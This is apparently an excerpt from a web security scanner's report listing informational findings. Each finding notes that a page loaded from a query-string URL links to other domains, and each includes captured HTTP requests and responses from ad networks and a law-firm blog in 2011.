Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/2886387?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1163:221:0:50998:1315324934:B2|74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 16:07:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:46:221:0:50999:1315325243:B2|74:1655:1163:221:0:50998:1315324934:B2|74:1655:721:221:0:50997:1315324624:B2; expires=Fri, 07-Oct-2011 16:07:23 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 752

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA" target="_blank" title="Online $7 Trades! Click to find out more!"><img style="border:none;" src="http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/7_gradient_120x60NL.jpg" alt="Online $7 Trades! Click to find out more!" /></a>
...[SNIP]...

19.27. http://ads.adsonar.com/adserving/getAds.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The page was loaded from a URL containing a query string (see the Request below). The response contains a link to another domain (see the Response below).

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1515491&pid=2257767&ps=-1&zw=336&zh=300&url=http%3A//www.cnbc.com/&v=5&dct=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&ref=http%3A//search.cnbc.com/main.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D%28The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM%29%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:56:43 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 13432


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
<td class="sps_1515489" style="height:12px;" nowrap="nowrap" align="right">
                                       &nbsp;<a href="http://cnbc.sl.advertising.com/admin/advertisers/indexPl.jsp" target="_blank">
                                       
                                           Buy a link here
                                       
                                       </a>
...[SNIP]...

19.28. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string (see the Request below). The response contains a link to another domain (see the Response below).

Request

GET /PortalServe/?pid=1398295G52620110830164853&pub=IC13501&flash=10&time=2|14:57|-5&redir=http://a1.interclick.com/icaid/192677/tid/1ff795b7-a8cc-487d-bdd1-056be6aa440f/click.ic?$CTURL$&pos=x&dom=http://search.cnbc.com&r=0.07496926933526993 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=47AC0400-3F06-2A6D-020A-1BB000220100; PRca=|AKln*9320:2|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKlnAC0U:2|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FrlJ:2|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GW7X:2|GV2B:1|GV12:2|GSur:3|#; PRpc=|FrlJGW7X:2|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 14:57:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4496
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=47AC0400-C30A-57B3-020A-1BB000220100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKln*9320:4|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKlnAC0U:4|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FrlJ:4|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GW7X:4|GV2B:1|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FrlJGW7X:4|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><object id='prfls47AC0400C30A57B3020A1BB000220100' name='prfls47AC0400C30A57B3020A1BB000220100' classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0 width='300' height='250' style='width:300px;height:250px'><param name='movie' value='http://speed.pointroll.com/PointRoll/Media/Banners/Lego/893716/superbrick_300x250_flash_r01.swf?PRCampID=41403&PRPubID=interclk&PRAdSize=300x250&PRFormat=FL&PRAd=1516605&PRCI
...[SNIP]...

19.29. http://afe.specificclick.net/serve/v=5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The page was loaded from a URL containing a query string (see the Request below). The response contains links to other domains (see the Response below).

Request

GET /serve/v=5;m=3;l=4749;c=176996;b=1045098;ts=20110906105904 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=f3fe521e99c2f212b60492987a2d

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 06 Sep 2011 14:59:05 GMT
Vary: Accept-Encoding
Content-Length: 1708
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
<div style="z-index:10; position:relative; width:300px"><IFRAME SRC="http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906105905%3Bdct=;ord=1315321145?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906105905%3Bdct=;ord=1315321145?"></SCRIPT><NOSCRIPT><A HREF="http://ad.doubleclick.net/jump/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];ord=1315321145?"><IMG SRC="http://ad.doubleclick.net/ad/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];ord=1315321145?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...
<div style="z-index:2147483647; position:absolute; right:0px; top:0px; background:transparent; opacity:0.8; filter:alpha(opacity=80);"><a href="http://specificmedia.com/sites/privacy/?cid=176996&bid=1045098&lid=4749" target="_blank"><img src="http://cache.specificmedia.com/otherassets/ad_options_icon.png" style="border-style:none"></a></div></div><img src="http://cache.specificmedia.com/creative/blank.gif?ts=20110906105905&cmxid=2101.020017699601045098xmc" style="display: none" height="1" width="1" border="0" /></body>
...[SNIP]...

19.30. http://afe.specificclick.net/serve/v=5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The page was loaded from a URL containing a query string (see the Request below). The response contains links to other domains (see the Response below).

Request

GET /serve/v=5;m=3;l=4749;c=176996;b=1045098;ts=20110906110541 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=f45f22ce332bb32f495908027d55

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=f45f2c4eedfe5c52c57643e800e5; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 06 Sep 2011 15:05:40 GMT
Vary: Accept-Encoding
Content-Length: 1708
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
<div style="z-index:10; position:relative; width:300px"><IFRAME SRC="http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906110541%3Bdct=;ord=1315321541?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906110541%3Bdct=;ord=1315321541?"></SCRIPT><NOSCRIPT><A HREF="http://ad.doubleclick.net/jump/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];ord=1315321541?"><IMG SRC="http://ad.doubleclick.net/ad/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];ord=1315321541?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...
<div style="z-index:2147483647; position:absolute; right:0px; top:0px; background:transparent; opacity:0.8; filter:alpha(opacity=80);"><a href="http://specificmedia.com/sites/privacy/?cid=176996&bid=1045098&lid=4749" target="_blank"><img src="http://cache.specificmedia.com/otherassets/ad_options_icon.png" style="border-style:none"></a></div></div><img src="http://cache.specificmedia.com/creative/blank.gif?ts=20110906110541&cmxid=2101.020017699601045098xmc" style="display: none" height="1" width="1" border="0" /></body>
...[SNIP]...

19.31. http://afe.specificclick.net/serve/v=5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /serve/v=5;m=3;l=4749;c=177065;b=1045312;ts=20110906111049 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339845382&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=f45f2c4eedfe5c52c57643e800e5

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=f4aa63ac19a41e25cbb18981ca05; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 06 Sep 2011 15:10:48 GMT
Vary: Accept-Encoding
Content-Length: 1728
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
<div style="z-index:10; position:relative; width:300px"><IFRAME SRC="http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.38;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=177065%3Bb=1045312%3Bts=20110906111049%3Bdct=;ord=1315321849?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.SpecificMedia.com/B5645537.38;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=177065%3Bb=1045312%3Bts=20110906111049%3Bdct=;ord=1315321849?"></SCRIPT><NOSCRIPT><A HREF="http://ad.doubleclick.net/jump/N763.SpecificMedia.com/B5645537.38;sz=300x250;pc=[TPAS_ID];ord=1315321849?"><IMG SRC="http://ad.doubleclick.net/ad/N763.SpecificMedia.com/B5645537.38;sz=300x250;pc=[TPAS_ID];ord=1315321849?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...
<div style="z-index:2147483647; position:absolute; right:0px; top:0px; background:transparent; opacity:0.8; filter:alpha(opacity=80);"><a href="http://specificmedia.com/sites/privacy/?cid=177065&bid=1045312&lid=4749" target="_blank"><img src="http://cache.specificmedia.com/otherassets/ad_options_icon.png" style="border-style:none"></a></div></div><img src="http://cache.specificmedia.com/creative/blank.gif?ts=20110906111049&cmxid=2101.020017706501045312xmc" style="display: none" height="1" width="1" border="0" /></body>
...[SNIP]...

19.32. http://blog.harbottle.com/dm/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.harbottle.com
Path:   /dm/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /dm/?p=20 HTTP/1.1
Host: blog.harbottle.com
Proxy-Connection: keep-alive
Referer: http://blog.harbottle.com/dm/index.php?s=ip+phone+internet
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; PHPSESSID=b6055d312cfe49b165dbf84a4f9f142b; __utma=40427633.423165929.1315345403.1315345403.1315345403.1; __utmc=40427633; __utmz=40427633.1315345403.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=40427633

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:08 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
X-Pingback: http://blog.harbottle.com/dm/xmlrpc.php
Status: 200 OK
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16588

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<title>Digital Media Law &raquo; Is an Age Verification Law on the Cards?</title
...[SNIP]...
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://blog.harbottle.com/dm/xmlrpc.php?rsd">
<link rel="powered" title="Elliott Back's Antispam" href="http://elliottback.com"><script type="text/javascript" src="http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php">
...[SNIP]...
<p>There are several references in the speeches of their Lordships to a service run by <a href="http://www.192.com/">www.192.com</a>
...[SNIP]...
<li><a href="http://www.broadcastnow.co.uk/opinion_and_blogs/index.html">Broadcast Magazine Blog</a>
...[SNIP]...
<li><a href="http://www.ft.com/comment/blogs/">FT.com Blog Pages</a>
...[SNIP]...
<li><a href="http://www.guardian.co.uk/media/digitalmedia">The Guardian - Digital Media</a>
...[SNIP]...
<p>&#169; 2011 Harbottle &amp; Lewis LLP Powered by <a href="http://wordpress.org/">WordPress</a>
...[SNIP]...
</a>.
   Valid: <a href="http://validator.w3.org/check/referer" title="Validate the markup">HTML</a>,
   <a href="http://jigsaw.w3.org/css-validator/check/referer" title="Validate the stylesheet">CSS</a>.
   Modified <a href="http://dev.d10e.net/neptune/" title="Neptune WP theme development site">Neptune theme</a>
...[SNIP]...
<!-- end of #wrap -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

19.33. http://blog.harbottle.com/dm/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.harbottle.com
Path:   /dm/index.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /dm/index.php?s=xss HTTP/1.1
Host: blog.harbottle.com
Proxy-Connection: keep-alive
Referer: http://blog.harbottle.com/dm/?cat=11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; PHPSESSID=b6055d312cfe49b165dbf84a4f9f142b; __utma=40427633.423165929.1315345403.1315345403.1315345403.1; __utmc=40427633; __utmz=40427633.1315345403.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=40427633

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:43:45 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
X-Pingback: http://blog.harbottle.com/dm/xmlrpc.php
Status: 200 OK
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9683

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<title>Digital Media Law</title>
<base href="http://blog.harbottle.com/dm/">
...[SNIP]...
<li><a href="http://www.broadcastnow.co.uk/opinion_and_blogs/index.html">Broadcast Magazine Blog</a>
...[SNIP]...
<li><a href="http://www.ft.com/comment/blogs/">FT.com Blog Pages</a>
...[SNIP]...
<li><a href="http://www.guardian.co.uk/media/digitalmedia">The Guardian - Digital Media</a>
...[SNIP]...
<p>&#169; 2011 Harbottle &amp; Lewis LLP Powered by <a href="http://wordpress.org/">WordPress</a>
...[SNIP]...
</a>.
   Valid: <a href="http://validator.w3.org/check/referer" title="Validate the markup">HTML</a>,
   <a href="http://jigsaw.w3.org/css-validator/check/referer" title="Validate the stylesheet">CSS</a>.
   Modified <a href="http://dev.d10e.net/neptune/" title="Neptune WP theme development site">Neptune theme</a>
...[SNIP]...
<!-- end of #wrap -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

19.34. http://clickserve.dartsearch.net/link/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clickserve.dartsearch.net
Path:   /link/click

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /link/click?lid=43700003033082322&ds_s_kwgid=58700000011300929&ds_e_adid=8129792445&ds_e_matchtype=search&ds_url_v=2&gclid=CI2H3L74iKsCFRE9gwodYgUI1Q HTTP/1.1
Host: clickserve.dartsearch.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Location: http://ad.doubleclick.net/clk;243728195;67400646;n;u=ds&sv1=3033082322&sv2=2011090690&sv3=2913415;%3fhttp://www.bigcommerce.com/lp/e1-lp-ecommerce.php?ga_campaign=(roi)+ecommerce&ga_adgroup=ecommerce+solutions&ga_keyword=e+commerce+solutions&gclid=CI2H3L74iKsCFRE9gwodYgUI1Q
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:32:11 GMT
Expires: Tue, 06 Sep 2011 15:32:11 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 480
Server: GSE

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="http://ad.doubleclick.net/clk;243728195;67400646;n;u=ds&amp;sv1=3033082322&amp;sv2=2011090690&amp;sv3=2913415;%3fhttp://www.bigcommerce.com/lp/e1-lp-ecommerce.php?ga_campaign=(roi)+ecommerce&amp;ga_adgroup=ecommerce+solutions&amp;ga_keyword=e+commerce+solutions&amp;gclid=CI2H3L74iKsCFRE9gwodYgUI1Q">here</A>
...[SNIP]...

19.35. http://d7.zedo.com/jsc/d3/fl.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=&z=0318423006 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342934886&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "2202213-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=390
Expires: Tue, 06 Sep 2011 16:08:47 GMT
Date: Tue, 06 Sep 2011 16:02:17 GMT
Content-Length: 1869
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;


               
...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }


